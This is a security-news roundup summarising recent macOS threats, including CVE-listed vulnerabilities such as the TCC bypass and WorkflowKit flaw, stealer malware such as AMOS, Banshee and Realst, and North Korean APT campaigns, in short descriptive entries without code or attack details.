In an increasingly connected digital era, macOS has become an enticing target for cybercriminals. From exploiting vulnerabilities that allow malicious applications to access sensitive data without user consent to sophisticated malware attacks targeting cryptocurrency assets, these threats underscore the importance of security awareness.
This article will explore recent incidents, including TCC-based vulnerabilities, attacks by APT groups, and malware specifically targeting macOS users, as well as essential protective measures that users should take to safeguard their personal data and devices from these emerging threats.
Malicious Applications to bypass User Consent and Access Sensitive Data on macOS system
A newly identified vulnerability in Apple’s Transparency, Consent, and Control (TCC) framework, designated as CVE-2024–44131, allows malicious applications to bypass user consent and access sensitive data on both macOS and iOS systems. This flaw has been patched in the latest versions of the operating systems, but it raises significant concerns about user privacy and data security. read more..
macOS Malware payload named ‘InletDrift’
Radiant Capital has attributed a $50 million cryptocurrency theft to North Korean threat actors known as Citrine Sleet, following a sophisticated cyberattack that exploited vulnerabilities in their systems. The attack involved malware that bypassed multiple security layers, leading to unauthorized transactions. PDF file to be used as a decoy and a macOS malware payload named ‘InletDrift,’ which established a backdoor on the infected device. read more..
Realst stealer malware targeting macOS systems
Cybercriminals are exploiting the Web3 sector by using fake business meetings to distribute malware that targets cryptocurrency assets. Dubbed “Meeten,” this campaign employs sophisticated social engineering tactics to lure victims into downloading malicious software. The “Meeten” campaign uses fraudulent video conferencing software to distribute Realst stealer malware targeting both Windows and macOS systems. read more..
GodLoader malware, PoC exploits indicate potential for macOS attacks
Hackers have leveraged the GodLoader malware to exploit the Godot game engine, infecting over 17,000 systems in just three months by using the engine’s capabilities to evade detection. This malware targets gamers across multiple platforms, allowing attackers to execute arbitrary code and steal sensitive information. GodLoader samples were primarily found targeting Windows, but proof-of-concept exploits indicate potential for Linux and macOS attacks. read more..
Banshee Stealer targeted both x86_64 and ARM64 architectures on macOS
The source code for the macOS malware Banshee Stealer has been leaked and published on GitHub, leading to the shutdown of its operations by its developers. This malware, which targeted sensitive data, was previously promoted by Russian hackers. read more..
Attackers can exploit the macOS to gain root privileges without needing a password
A critical vulnerability in Apple’s MallocStackLogging framework allows attackers to achieve local privilege escalation on macOS systems, posing a significant security risk. Despite Apple’s mitigations, the flaw can be exploited through clever manipulation of log file writes. read more..
The Vulnerabilities that could lead to arbitrary code execution on Intel-based Macs
Apple has released critical security updates addressing two actively exploited vulnerabilities in its operating systems, discovered by Google’s Threat Analysis Group. The vulnerabilities, CVE-2024–44308 and CVE-2024–44309, primarily affect Intel-based Mac systems and could allow for arbitrary code execution. read more..
Malicious apps can modify shortcut files without user consent, potentially injecting harmful code
A critical security flaw in WorkflowKit, identified as CVE-2024–27821, allows malicious apps to intercept and modify shortcut files during the extraction process. This vulnerability poses significant risks, including the potential for arbitrary code execution and data exposure. read more..
AMOS targets macOS tostealing sensitive data
Fake AI image and video generators are being used to distribute Lumma Stealer and AMOS malware, targeting Windows and macOS systems to steal sensitive information such as credentials and cryptocurrency wallets. These malicious sites impersonate a legitimate AI application, tricking users into downloading harmful software. read more..
North Korean APT group Lazarus, targeting macOS systems
Researchers at Group-IB have uncovered a new stealth technique used by the North Korean APT group Lazarus, which targets macOS systems through a code-smuggling method that utilizes custom extended attributes to evade antivirus detection. This method involves the deployment of a Trojan named RustyAttr, developed with the Tauri framework, allowing the malware to operate discreetly while distracting users with decoy applications. read more..
Some Zoom apps for macOS before version 6.1.5 may allow an authenticated user to conduct an escalation of privilege via network access
Zoom has addressed six vulnerabilities in its video conferencing platform, including two high-severity issues that could allow remote attackers to escalate privileges or leak sensitive information. The vulnerabilities affect various Zoom applications and require updates to mitigate risks. read more..
Attackers can exploit Chrome macOS users via the File System Access API
Security researcher Ron Masas from Imperva Threat Research has revealed a new method for attackers to exploit Chrome users via the File System Access API, which can bypass security mechanisms on both Windows and macOS. This exploit can lead to severe security vulnerabilities, particularly for macOS users, if they inadvertently grant file access to malicious applications. read more..
Notepad and Minesweeper games can passed Apple’s security checks
North Korean threat actors are targeting macOS systems with trojanized applications disguised as Notepad and Minesweeper games, leveraging a legitimate Apple developer ID to bypass security checks. The campaign appears to be an experimental effort to test methods for evading macOS security rather than a fully developed attack strategy. read more..
LightSpy spyware targeting macOS
Researchers have uncovered an advanced version of the LightSpy spyware targeting Apple iOS, which not only enhances its data-capturing capabilities but also introduces destructive features that can render devices inoperable. This modular implant exploits known vulnerabilities in iOS and macOS to deliver its payload and gather sensitive information from compromised devices. read more..
The “CryptoAITools” malware activates immediately upon installation, targeting macOS systems
Researchers have uncovered a malicious Python package named “CryptoAITools” that masquerades as a cryptocurrency trading tool but is designed to steal sensitive data and drain crypto wallets. The malware, distributed via PyPI and fake GitHub repositories, has been downloaded over 1,300 times and employs deceptive tactics to execute its malicious activities. read more..